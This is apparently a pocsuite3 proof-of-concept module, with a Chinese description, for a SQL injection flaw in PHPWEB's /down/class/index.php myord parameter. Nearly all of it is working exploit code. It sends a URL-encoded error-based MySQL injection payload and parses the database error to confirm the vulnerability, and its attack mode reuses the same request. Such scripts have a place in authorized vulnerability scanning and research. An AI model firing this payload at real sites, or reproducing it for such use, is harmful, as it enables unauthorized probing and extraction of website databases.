phpweb /down/class/index.php SQL注入漏洞

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ import re from pocsuite3.api import Output, POCBase, register_poc, requests class DemoPOC(POCBase): vulID = '1107' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2013-11-12' createDate = '2013-11-13' updateDate = '2013-11-13' references = ['http://sbqing.com/archives/944.html'] name = 'phpweb /down/class/index.php SQL注入漏洞 POC' appPowerLink = 'http://www.phpweb.net/' appName = 'PHPWEB' appVersion = '#' vulType = 'SQL Injection' desc = ''' phpweb /down/class/index.php 文件中以GET方式接受了一个参数myord作为SQL语句中order by $myord子句的参数，而且myord变量没有经过任何过滤，加上一个单引号后，发现程序报错。 ''' samples = [] install_requires = [''] def _verify(self): result = {} payload = "/down/class/index.php?myord=1%20AND%20(SELECT%209913%20FROM(SELECT%20COUNT(*),CONCAT(0x7178656e71,(SELECT%20(CASE%20WHEN%20(9913=9913)%20THEN%201%20ELSE%200%20END)),0x7166747071,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)" content = requests.get(self.url + payload).text reg = re.compile("MySQL Error<\/b>\: 1062 \(Duplicate entry '(.*?)' for key 'group_key'") res = reg.findall(content) if res: result['Database'] = {} result['Database']['DBname'] = res[0] return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() def _shell(self): pass register_poc(DemoPOC)